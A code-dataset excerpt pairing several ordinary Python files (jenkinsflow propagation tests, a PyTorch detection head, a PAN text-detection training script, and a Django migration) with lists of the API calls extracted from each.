api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1, serial=True)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.parallel(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial_continue(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=3)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=4)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_serial_continue(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial_continue_fail(api_type):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=3)
api.job('j23_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=4)
with raises(FailedChildJobException):
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23_fail')
def test_propagation_warn_only_nested_parallel_serial_continue_fail(api_type):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j23_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
with raises(FailedChildJobsException):
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial() as ctrl2:
ctrl2.invoke('j21')
with ctrl2.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl3:
ctrl3.invoke('j22_fail')
ctrl2.invoke('j23_fail')
| [
"jenkinsflow.flow.serial",
"jenkinsflow.flow.parallel",
"pytest.raises"
] | [((852, 980), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)', 'propagation': 'Propagation.FAILURE_TO_UNSTABLE'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE)\n', (858, 980), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((1637, 1767), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)', 'propagation': 'Propagation.FAILURE_TO_UNSTABLE'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE)\n', (1645, 1767), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((2438, 2517), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (2444, 2517), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((3361, 3446), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (3369, 3446), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((4269, 4348), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (4275, 4348), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((5176, 5261), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (5184, 5261), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((6092, 6171), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (6098, 6171), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((7056, 7141), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (7064, 7141), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((8019, 8050), 'pytest.raises', 'raises', (['FailedChildJobException'], {}), '(FailedChildJobException)\n', (8025, 8050), False, 'from pytest import raises\n'), ((9061, 9093), 'pytest.raises', 'raises', (['FailedChildJobsException'], {}), '(FailedChildJobsException)\n', (9067, 9093), False, 'from pytest import raises\n'), ((8069, 8148), 'jenkinsflow.flow.serial', 'serial', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3)\n', (8075, 8148), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n'), ((9112, 9197), 'jenkinsflow.flow.parallel', 'parallel', (['api'], {'timeout': '(70)', 'job_name_prefix': 'api.job_name_prefix', 'report_interval': '(3)'}), '(api, timeout=70, job_name_prefix=api.job_name_prefix,\n report_interval=3)\n', (9120, 9197), False, 'from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult\n')] |
import torch
from torch import nn
from net.init_net import xavier_init
from net.basic_cnn import DWConvBnReluPool
"""
DW-DW-PW
"""
class Head(nn.Module):
def __init__(self,reg_max = 8, #defalut =8个bbox,用于分布, general focal loss format
inChannels = 96, #
clsOutChannels = 7):
super(Head, self).__init__()
self.reg_max = reg_max
self.inChannels = inChannels
self.clsOutChannels = clsOutChannels
self.makeLayers()
def makeLayers(self):
self.head= nn.ModuleList()
for i in range(2):
conv = DWConvBnReluPool(self.inChannels,self.inChannels, kernelSize = 3, stride = 1,
bias = True, bn = True, relu = True, maxp2 = False)
self.head.append(conv)
conv = nn.Conv2d(self.inChannels,
self.clsOutChannels + 4 * (self.reg_max),
1)
self.head.append(conv)
def init_weight(self):
for conv in self.modules():
if isinstance(conv, nn.Conv2d):
xavier_init(conv, distribution='uniform')
def forward(self, x):
for conv in self.head:
x = conv(x)
return x
if __name__ == '__main__':
from torchsummary import summary
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
net = Head().to(device)
summary(net, (96, 320, 320))
# net = nanodet_PAN(cfg)
# import netron
# import os
#
# x = torch.rand(2,58,320,320)
# net(x)
# name = os.path.basename(__file__)
# name = name.split('.')[0]
# onnx_path = '/media/q/deep/me/model/pytorch_script_use/'+name+'.onnx'
# torch.onnx.export(net, x, onnx_path)
# netron.start(onnx_path)
| [
"net.init_net.xavier_init",
"torch.nn.ModuleList",
"net.basic_cnn.DWConvBnReluPool",
"torch.nn.Conv2d",
"torch.cuda.is_available",
"torchsummary.summary"
] | [((1402, 1430), 'torchsummary.summary', 'summary', (['net', '(96, 320, 320)'], {}), '(net, (96, 320, 320))\n', (1409, 1430), False, 'from torchsummary import summary\n'), ((535, 550), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (548, 550), False, 'from torch import nn\n'), ((814, 883), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.inChannels', '(self.clsOutChannels + 4 * self.reg_max)', '(1)'], {}), '(self.inChannels, self.clsOutChannels + 4 * self.reg_max, 1)\n', (823, 883), False, 'from torch import nn\n'), ((597, 719), 'net.basic_cnn.DWConvBnReluPool', 'DWConvBnReluPool', (['self.inChannels', 'self.inChannels'], {'kernelSize': '(3)', 'stride': '(1)', 'bias': '(True)', 'bn': '(True)', 'relu': '(True)', 'maxp2': '(False)'}), '(self.inChannels, self.inChannels, kernelSize=3, stride=1,\n bias=True, bn=True, relu=True, maxp2=False)\n', (613, 719), False, 'from net.basic_cnn import DWConvBnReluPool\n'), ((1332, 1357), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1355, 1357), False, 'import torch\n'), ((1089, 1130), 'net.init_net.xavier_init', 'xavier_init', (['conv'], {'distribution': '"""uniform"""'}), "(conv, distribution='uniform')\n", (1100, 1130), False, 'from net.init_net import xavier_init\n')] |
'''
THis is the main training code.
'''
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0" # set GPU id at the very begining
import argparse
import random
import math
import numpy as np
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
from torch.multiprocessing import freeze_support
import json
import sys
import time
import pdb
# internal package
from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom
from models.pan import PAN
from loss.loss import loss
from utils.helper import adjust_learning_rate, upsample
from utils.average_meter import AverageMeter
torch.set_num_threads(2)
# main function:
if __name__ == '__main__':
freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument(
'--batch', type=int, default=16, help='input batch size')
parser.add_argument(
'--worker', type=int, default=4, help='number of data loading workers')
parser.add_argument(
'--epoch', type=int, default=601, help='number of epochs')
parser.add_argument('--output', type=str, default='outputs', help='output folder name')
parser.add_argument('--model', type=str, default='', help='model path')
parser.add_argument('--dataset_type', type=str, default='ctw', help="dataset type - ctw | tt | synthtext | msra | ic15 | custom")
parser.add_argument('--gpu', type=bool, default=False, help="GPU being used or not")
opt = parser.parse_args()
print(opt)
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed:", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
torch.cuda.manual_seed(opt.manualSeed)
np.random.seed(opt.manualSeed)
# turn on GPU for models:
if opt.gpu == False:
device = torch.device("cpu")
print("CPU being used!")
else:
if torch.cuda.is_available() == True and opt.gpu == True:
device = torch.device("cuda")
print("GPU being used!")
else:
device = torch.device("cpu")
print("CPU being used!")
# set training parameters
batch_size = opt.batch
neck_channel = (64, 128, 256, 512)
pa_in_channels = 512
hidden_dim = 128
num_classes = 6
loss_text_weight = 1.0
loss_kernel_weight = 0.5
loss_emb_weight = 0.25
opt.optimizer = 'Adam'
opt.lr = 1e-3
opt.schedule = 'polylr'
epochs = opt.epoch
worker = opt.worker
dataset_type = opt.dataset_type
output_path = opt.output
trained_model_path = opt.model
# create dataset
print("Create dataset......")
if dataset_type == 'ctw': # ctw dataset
train_dataset = ctw1500.PAN_CTW(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
report_speed=False)
elif dataset_type == 'tt': # totaltext dataset
train_dataset = totaltext.PAN_TT(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
with_rec=False,
report_speed=False)
elif dataset_type == 'synthtext': # synthtext dataset
train_dataset = synthtext.PAN_Synth(is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.5,
with_rec=False)
elif dataset_type == 'msra': # msra dataset
train_dataset = msra.PAN_MSRA(split='train',
is_transform=True,
img_size=736,
short_size=736,
kernel_scale=0.7,
report_speed=False)
elif dataset_type == 'ic15': # msra dataset
train_dataset = ic15.PAN_IC15(split='train',
is_transform=True,
img_size=736,
short_size=736,
kernel_scale=0.5,
with_rec=False)
elif dataset_type == 'custom': # msra dataset
train_dataset = custom.PAN_CTW(split='train',
is_transform=True,
img_size=640,
short_size=640,
kernel_scale=0.7,
report_speed=False)
else:
print("Not supported yet!")
exit(1)
# make dataloader
train_dataloader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=int(worker),
drop_last=True,
pin_memory=True)
print("Length of train dataset is:", len(train_dataset))
# make model output folder
try:
os.makedirs(output_path)
except OSError:
pass
# create model
print("Create model......")
model = PAN(pretrained=False, neck_channel=neck_channel, pa_in_channels=pa_in_channels, hidden_dim=hidden_dim, num_classes=num_classes)
if trained_model_path != '':
if torch.cuda.is_available() == True and opt.gpu == True:
model.load_state_dict(torch.load(trained_model_path, map_location=lambda storage, loc: storage), strict=False)
model = torch.nn.DataParallel(model).to(device)
else:
model.load_state_dict(torch.load(trained_model_path, map_location=lambda storage, loc: storage), strict=False)
else:
if torch.cuda.is_available() == True and opt.gpu == True:
model = torch.nn.DataParallel(model).to(device)
else:
model = model.to(device)
if opt.optimizer == 'SGD':
optimizer = optim.SGD(model.parameters(), lr=opt.lr, momentum=0.99, weight_decay=5e-4)
elif opt.optimizer == 'Adam':
optimizer = optim.Adam(model.parameters(), lr=opt.lr)
else:
print("Error: Please specify correct optimizer!")
exit(1)
# train, evaluate, and save model
print("Training starts......")
start_epoch = 0
for epoch in range(start_epoch, epochs):
print('Epoch: [%d | %d]' % (epoch + 1, epochs))
model.train()
# meters
losses = AverageMeter()
losses_text = AverageMeter()
losses_kernels = AverageMeter()
losses_emb = AverageMeter()
losses_rec = AverageMeter()
ious_text = AverageMeter()
ious_kernel = AverageMeter()
for iter, data in enumerate(train_dataloader):
# adjust learning rate
adjust_learning_rate(optimizer, train_dataloader, epoch, iter, opt.schedule, opt.lr, epochs)
outputs = dict()
# forward for detection output
det_out = model(data['imgs'].to(device))
det_out = upsample(det_out, data['imgs'].size())
# retreive ground truth labels
gt_texts = data['gt_texts'].to(device)
gt_kernels = data['gt_kernels'].to(device)
training_masks = data['training_masks'].to(device)
gt_instances = data['gt_instances'].to(device)
gt_bboxes = data['gt_bboxes'].to(device)
# calculate total loss
det_loss = loss(det_out, gt_texts, gt_kernels, training_masks, gt_instances, gt_bboxes, loss_text_weight, loss_kernel_weight, loss_emb_weight)
outputs.update(det_loss)
# detection loss
loss_text = torch.mean(outputs['loss_text'])
losses_text.update(loss_text.item())
loss_kernels = torch.mean(outputs['loss_kernels'])
losses_kernels.update(loss_kernels.item())
loss_emb = torch.mean(outputs['loss_emb'])
losses_emb.update(loss_emb.item())
loss_total = loss_text + loss_kernels + loss_emb
iou_text = torch.mean(outputs['iou_text'])
ious_text.update(iou_text.item())
iou_kernel = torch.mean(outputs['iou_kernel'])
ious_kernel.update(iou_kernel.item())
losses.update(loss_total.item())
# backward
optimizer.zero_grad()
loss_total.backward()
optimizer.step()
# print log
#print("batch: {} / total batch: {}".format(iter+1, len(train_dataloader)))
if iter % 20 == 0:
output_log = '({batch}/{size}) LR: {lr:.6f} | ' \
'Loss: {loss:.3f} | ' \
'Loss (text/kernel/emb): {loss_text:.3f}/{loss_kernel:.3f}/{loss_emb:.3f} ' \
'| IoU (text/kernel): {iou_text:.3f}/{iou_kernel:.3f}'.format(
batch=iter + 1,
size=len(train_dataloader),
lr=optimizer.param_groups[0]['lr'],
loss_text=losses_text.avg,
loss_kernel=losses_kernels.avg,
loss_emb=losses_emb.avg,
loss=losses.avg,
iou_text=ious_text.avg,
iou_kernel=ious_kernel.avg,
)
print(output_log)
sys.stdout.flush()
with open(os.path.join(output_path,'statistics.txt'), 'a') as f:
f.write("{} {} {} {} {} {}\n".format(losses_text.avg, losses_kernels.avg, losses_emb.avg, losses.avg, ious_text.avg, ious_kernel.avg))
if epoch % 20 == 0:
print("Save model......")
if torch.cuda.is_available() == True and opt.gpu == True:
torch.save(model.module.state_dict(), '%s/model_epoch_%s.pth' % (output_path, str(epoch)))
else:
torch.save(model.state_dict(), '%s/model_epoch_%s.pth' % (output_path, str(epoch))) | [
"dataset.synthtext.PAN_Synth",
"torch.cuda.is_available",
"torch.multiprocessing.freeze_support",
"loss.loss.loss",
"argparse.ArgumentParser",
"models.pan.PAN",
"torch.mean",
"dataset.custom.PAN_CTW",
"torch.set_num_threads",
"numpy.random.seed",
"sys.stdout.flush",
"dataset.ic15.PAN_IC15",
... | [((647, 671), 'torch.set_num_threads', 'torch.set_num_threads', (['(2)'], {}), '(2)\n', (668, 671), False, 'import torch\n'), ((720, 736), 'torch.multiprocessing.freeze_support', 'freeze_support', ([], {}), '()\n', (734, 736), False, 'from torch.multiprocessing import freeze_support\n'), ((750, 775), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (773, 775), False, 'import argparse\n'), ((1523, 1547), 'random.randint', 'random.randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (1537, 1547), False, 'import random\n'), ((1606, 1633), 'random.seed', 'random.seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1617, 1633), False, 'import random\n'), ((1638, 1671), 'torch.manual_seed', 'torch.manual_seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1655, 1671), False, 'import torch\n'), ((1676, 1714), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1698, 1714), False, 'import torch\n'), ((1719, 1749), 'numpy.random.seed', 'np.random.seed', (['opt.manualSeed'], {}), '(opt.manualSeed)\n', (1733, 1749), True, 'import numpy as np\n'), ((5596, 5728), 'models.pan.PAN', 'PAN', ([], {'pretrained': '(False)', 'neck_channel': 'neck_channel', 'pa_in_channels': 'pa_in_channels', 'hidden_dim': 'hidden_dim', 'num_classes': 'num_classes'}), '(pretrained=False, neck_channel=neck_channel, pa_in_channels=\n pa_in_channels, hidden_dim=hidden_dim, num_classes=num_classes)\n', (5599, 5728), False, 'from models.pan import PAN\n'), ((1827, 1846), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1839, 1846), False, 'import torch\n'), ((2718, 2840), 'dataset.ctw1500.PAN_CTW', 'ctw1500.PAN_CTW', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size=\n 640, kernel_scale=0.7, report_speed=False)\n", (2733, 2840), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5474, 5498), 'os.makedirs', 'os.makedirs', (['output_path'], {}), '(output_path)\n', (5485, 5498), False, 'import os\n'), ((6892, 6906), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6904, 6906), False, 'from utils.average_meter import AverageMeter\n'), ((6929, 6943), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6941, 6943), False, 'from utils.average_meter import AverageMeter\n'), ((6969, 6983), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (6981, 6983), False, 'from utils.average_meter import AverageMeter\n'), ((7005, 7019), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7017, 7019), False, 'from utils.average_meter import AverageMeter\n'), ((7041, 7055), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7053, 7055), False, 'from utils.average_meter import AverageMeter\n'), ((7076, 7090), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7088, 7090), False, 'from utils.average_meter import AverageMeter\n'), ((7113, 7127), 'utils.average_meter.AverageMeter', 'AverageMeter', ([], {}), '()\n', (7125, 7127), False, 'from utils.average_meter import AverageMeter\n'), ((1977, 1997), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1989, 1997), False, 'import torch\n'), ((2070, 2089), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (2082, 2089), False, 'import torch\n'), ((3111, 3250), 'dataset.totaltext.PAN_TT', 'totaltext.PAN_TT', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'with_rec': '(False)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size\n =640, kernel_scale=0.7, with_rec=False, report_speed=False)\n", (3127, 3250), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((7244, 7340), 'utils.helper.adjust_learning_rate', 'adjust_learning_rate', (['optimizer', 'train_dataloader', 'epoch', 'iter', 'opt.schedule', 'opt.lr', 'epochs'], {}), '(optimizer, train_dataloader, epoch, iter, opt.schedule,\n opt.lr, epochs)\n', (7264, 7340), False, 'from utils.helper import adjust_learning_rate, upsample\n'), ((7918, 8053), 'loss.loss.loss', 'loss', (['det_out', 'gt_texts', 'gt_kernels', 'training_masks', 'gt_instances', 'gt_bboxes', 'loss_text_weight', 'loss_kernel_weight', 'loss_emb_weight'], {}), '(det_out, gt_texts, gt_kernels, training_masks, gt_instances, gt_bboxes,\n loss_text_weight, loss_kernel_weight, loss_emb_weight)\n', (7922, 8053), False, 'from loss.loss import loss\n'), ((8153, 8185), 'torch.mean', 'torch.mean', (["outputs['loss_text']"], {}), "(outputs['loss_text'])\n", (8163, 8185), False, 'import torch\n'), ((8263, 8298), 'torch.mean', 'torch.mean', (["outputs['loss_kernels']"], {}), "(outputs['loss_kernels'])\n", (8273, 8298), False, 'import torch\n'), ((8378, 8409), 'torch.mean', 'torch.mean', (["outputs['loss_emb']"], {}), "(outputs['loss_emb'])\n", (8388, 8409), False, 'import torch\n'), ((8543, 8574), 'torch.mean', 'torch.mean', (["outputs['iou_text']"], {}), "(outputs['iou_text'])\n", (8553, 8574), False, 'import torch\n'), ((8646, 8679), 'torch.mean', 'torch.mean', (["outputs['iou_kernel']"], {}), "(outputs['iou_kernel'])\n", (8656, 8679), False, 'import torch\n'), ((1901, 1926), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1924, 1926), False, 'import torch\n'), ((3574, 3680), 'dataset.synthtext.PAN_Synth', 'synthtext.PAN_Synth', ([], {'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.5)', 'with_rec': '(False)'}), '(is_transform=True, img_size=640, short_size=640,\n kernel_scale=0.5, with_rec=False)\n', (3593, 3680), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5769, 5794), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5792, 5794), False, 'import torch\n'), ((5858, 5931), 'torch.load', 'torch.load', (['trained_model_path'], {'map_location': '(lambda storage, loc: storage)'}), '(trained_model_path, map_location=lambda storage, loc: storage)\n', (5868, 5931), False, 'import torch\n'), ((6055, 6128), 'torch.load', 'torch.load', (['trained_model_path'], {'map_location': '(lambda storage, loc: storage)'}), '(trained_model_path, map_location=lambda storage, loc: storage)\n', (6065, 6128), False, 'import torch\n'), ((6165, 6190), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (6188, 6190), False, 'import torch\n'), ((9852, 9870), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (9868, 9870), False, 'import sys\n'), ((3925, 4045), 'dataset.msra.PAN_MSRA', 'msra.PAN_MSRA', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(736)', 'short_size': '(736)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=736, short_size=\n 736, kernel_scale=0.7, report_speed=False)\n", (3938, 4045), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((5967, 5995), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (5988, 5995), False, 'import torch\n'), ((6240, 6268), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (6261, 6268), False, 'import torch\n'), ((10189, 10214), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (10212, 10214), False, 'import torch\n'), ((4303, 4419), 'dataset.ic15.PAN_IC15', 'ic15.PAN_IC15', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(736)', 'short_size': '(736)', 'kernel_scale': '(0.5)', 'with_rec': '(False)'}), "(split='train', is_transform=True, img_size=736, short_size=\n 736, kernel_scale=0.5, with_rec=False)\n", (4316, 4419), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n'), ((9897, 9940), 'os.path.join', 'os.path.join', (['output_path', '"""statistics.txt"""'], {}), "(output_path, 'statistics.txt')\n", (9909, 9940), False, 'import os\n'), ((4679, 4800), 'dataset.custom.PAN_CTW', 'custom.PAN_CTW', ([], {'split': '"""train"""', 'is_transform': '(True)', 'img_size': '(640)', 'short_size': '(640)', 'kernel_scale': '(0.7)', 'report_speed': '(False)'}), "(split='train', is_transform=True, img_size=640, short_size=\n 640, kernel_scale=0.7, report_speed=False)\n", (4693, 4800), False, 'from dataset import ctw1500, totaltext, synthtext, msra, ic15, custom\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('library', '0011_auto_20150706_0957'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reviews', '0013_auto_20150708_1511'),
]
operations = [
migrations.CreateModel(
name='Study',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default='U', max_length=1, choices=[('U', 'Unclassified'), ('R', 'Rejected'), ('A', 'Accepted'), ('D', 'Duplicated')])),
('updated_at', models.DateTimeField(auto_now=True)),
('document', models.ForeignKey(to='library.Document')),
],
),
migrations.CreateModel(
name='StudySelection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('has_finished', models.BooleanField(default=False)),
('review', models.ForeignKey(to='reviews.Review')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.AddField(
model_name='study',
name='study_selection',
field=models.ForeignKey(to='reviews.StudySelection'),
),
]
| [
"django.db.models.ForeignKey",
